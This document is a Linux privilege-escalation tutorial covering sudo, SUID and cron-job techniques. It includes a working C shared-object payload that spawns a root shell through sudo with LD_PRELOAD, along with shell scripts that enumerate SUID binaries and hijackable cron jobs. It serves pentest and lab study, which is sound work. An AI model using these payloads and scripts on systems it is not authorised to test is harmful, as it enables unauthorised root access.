Linux Privesc Techniques

Some basic vulnerability explanations

Kernel Exploits

Sudo

  • Leverage LD_PRELOAD

    • Check the output of sudo -l for LD_PRELOAD being preserved through the env_keep option (sudo normally strips LD_* variables when it resets the environment)

    • Write a small C program whose constructor function spawns a shell, and compile it as a shared object (.so extension)

    • Run a program you are allowed to sudo with LD_PRELOAD pointing at our .so file; the loader maps the library into the root process sudo spawns, so the constructor runs as root

  • Leverage the application's own functions (a shell escape in an editor or pager, a file-read or file-write option, an exec flag)

If you have sudo rights to run a specific program, look it up on https://gtfobins.github.io/ for a known way to get a shell or read/write files through it.
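The LD_PRELOAD procedure above, as an added example (not code from the original page): a check that `sudo -l` preserves LD_PRELOAD, a list of the commands sudo allows, and a function that writes and compiles the payload library. The sample `sudo -l` output, the user name lowpriv and the allowed command /usr/bin/find are constructed for illustration; the paths in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example, not from the original page. The sudo -l text below is
# constructed; on a real target use: out=$(sudo -l)

SAMPLE_SUDO_L='Matching Defaults entries for lowpriv on host:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD

User lowpriv may run the following commands on host:
    (root) NOPASSWD: /usr/bin/find'

# Exit 0 if the given `sudo -l` output keeps LD_PRELOAD across env_reset.
# Matches both "env_keep+=LD_PRELOAD" and "env_keep=LD_PRELOAD" forms.
sudo_keeps_ld_preload() {
    printf '%s\n' "$1" | grep -Eq 'env_keep\+?=.*LD_PRELOAD'
}

# Print the commands `sudo -l` lets us run, one per line, stripped of the
# "(user) NOPASSWD:" prefix. Any one of them will do for the LD_PRELOAD trick.
sudo_allowed_commands() {
    printf '%s\n' "$1" |
        sed -nE 's/^[[:space:]]*\([^)]*\)[[:space:]]+(NOPASSWD:[[:space:]]*)?//p'
}

# Write and compile the payload library. $1: output .so path (assumed writable).
# The constructor runs when the loader maps the library into the process that
# sudo started as root, before the program's own main().
build_preload_so() {
    src="${1%.so}.c"
    cat > "$src" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) static void init(void)
{
    /* Drop LD_PRELOAD so the shell we spawn does not load us again. */
    unsetenv("LD_PRELOAD");
    /* sudo already gave us euid 0; make uid/gid 0 real so the shell keeps it. */
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setuid");
        return;
    }
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
}
EOF
    gcc -fPIC -shared -o "$1" "$src"
}

# On a target the sequence is (paths are assumptions):
#   out=$(sudo -l)
#   sudo_keeps_ld_preload "$out" && build_preload_so /tmp/shell.so \
#       && sudo LD_PRELOAD=/tmp/shell.so /usr/bin/find
if sudo_keeps_ld_preload "$SAMPLE_SUDO_L"; then
    echo "sudo preserves LD_PRELOAD; allowed commands:"
    sudo_allowed_commands "$SAMPLE_SUDO_L"
fi
```

The check is only worthwhile when env_keep lists LD_PRELOAD: with a default env_reset sudo strips LD_* variables and the library is never loaded. Use an absolute path for the .so, since the program runs with root's working directory, not yours.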

SUID

SUID -> set user ID

  • The SUID bit makes an executable run with the effective user ID of the file's owner rather than of the user who launched it, so a root-owned SUID binary runs as root for anyone allowed to execute it.

  • Find files with the SUID bit set (root-owned ones are the interesting targets).

  • Search GTFOBins for a way to abuse each SUID file (shell escape, file read or file write).

See https://www.stationx.net/linux-file-permissions-cheat-sheet/ for more info about file permissions
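SUID enumeration and triage from the steps above, as an added example that is not code from the original page. The shortlist of program names is a constructed assumption standing in for the SUID section of GTFOBins; confirm each hit against https://gtfobins.github.io/ before relying on it.

```shell
#!/bin/sh
# Added example, not from the original page. Finds SUID files under a root
# and flags those whose basename is on a constructed shortlist of programs
# that GTFOBins documents as abusable when SUID (assumption: verify on site).

SUID_SHORTLIST="bash sh find vim vi nmap python python3 perl env cp mv less more awk gawk tar zip"

# Print every SUID regular file under $1 (default /), staying on one
# filesystem and silencing permission errors from unreadable directories.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Exit 0 if the basename of $1 is on the shortlist.
is_shortlisted() {
    name=$(basename "$1")
    for s in $SUID_SHORTLIST; do
        [ "$s" = "$name" ] && return 0
    done
    return 1
}

# Print "owner path" for each shortlisted SUID file under $1. Root-owned
# hits are the ones that give root; others give that owner's account.
triage_suid() {
    find_suid "$1" | while read -r f; do
        if is_shortlisted "$f"; then
            printf '%s %s\n' "$(ls -ld "$f" | awk '{print $3}')" "$f"
        fi
    done
}

# Stand-alone use: scan the whole system (or a root given as $1).
case "${1:-}" in
    --scan) triage_suid "${2:-/}" ;;
esac
```

The unflagged SUID files are still worth a look: anything unusual for the distribution (custom binaries in /opt or /usr/local) is a candidate for manual analysis even if no GTFOBins entry exists.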

Cron Jobs

Cronjobs -> scheduled tasks

  • Identify the active jobs (system crontab, the cron.d directories, per-user crontabs, and the run-parts directories).

  • Check whether a job runs as root or as any other user worth becoming.

  • Change the script that job runs and gain the job owner's privileges. This works when the script (or its directory) is writable by us, or when the job names the command without a full path, so a same-named file dropped in a writable directory earlier in cron's PATH is executed instead.
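The cron checks above, as an added example that is not code from the original page: parse a system-format crontab, then report jobs whose script is writable and jobs that use a bare command name while the crontab's PATH contains a directory we can write to. The crontab contents in the test are constructed; the file locations in the scan loop are the usual Linux ones and are assumptions for your target.

```shell
#!/bin/sh
# Added example, not from the original page. Audits a system-format crontab
# (min hour dom mon dow user command, or @reboot user command) for the two
# loopholes described above: writable script, and relative command name
# resolved through a writable PATH directory.

# Print "user|command" for each job, skipping comments, blank lines and
# VAR=value assignments.
cron_jobs() {
    awk '
        /^[[:space:]]*(#|$)/ { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        {
            n = ($1 ~ /^@/) ? 2 : 6      # field that holds the user name
            cmd = ""
            for (i = n + 1; i <= NF; i++) cmd = cmd (i > n + 1 ? " " : "") $i
            print $n "|" cmd
        }' "$1"
}

# PATH the jobs will run with: the last PATH= line in the file, or cron's
# default of /usr/bin:/bin when none is set.
cron_path() {
    p=$(grep -E '^[[:space:]]*PATH=' "$1" | tail -n 1 | sed 's/^[[:space:]]*PATH=//; s/"//g')
    echo "${p:-/usr/bin:/bin}"
}

# Print one finding per line for the crontab in $1; nothing means clean.
audit_crontab() {
    path=$(cron_path "$1")
    cron_jobs "$1" | while IFS='|' read -r user cmd; do
        prog=${cmd%% *}                  # first word of the command line
        case "$prog" in
            /*) # absolute path: can we edit the file, or replace it via its directory?
                if [ -w "$prog" ]; then
                    echo "WRITABLE script $prog runs as $user"
                elif [ -w "$(dirname "$prog")" ]; then
                    echo "WRITABLE directory $(dirname "$prog") lets us replace $prog (runs as $user)"
                fi ;;
            *)  # bare name: cron searches its PATH in order, first match wins,
                # so a writable directory ahead of the real binary is ours
                old_ifs=$IFS; IFS=:
                for d in $path; do
                    if [ -w "$d" ]; then
                        echo "RELATIVE command $prog runs as $user; writable PATH dir $d"
                        break
                    fi
                    [ -x "$d/$prog" ] && break   # real binary found first: no hijack
                done
                IFS=$old_ifs ;;
        esac
    done
}

# Stand-alone use: audit the usual system crontabs (per-user crontabs in
# /var/spool/cron/crontabs are normally readable only by root).
if [ "${1:-}" = "--scan" ]; then
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && audit_crontab "$f"
    done
fi
```

Per-user crontabs (crontab -l) have no user field; feed them through the same checks with the user column removed, and remember that jobs there run as that user, not root.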
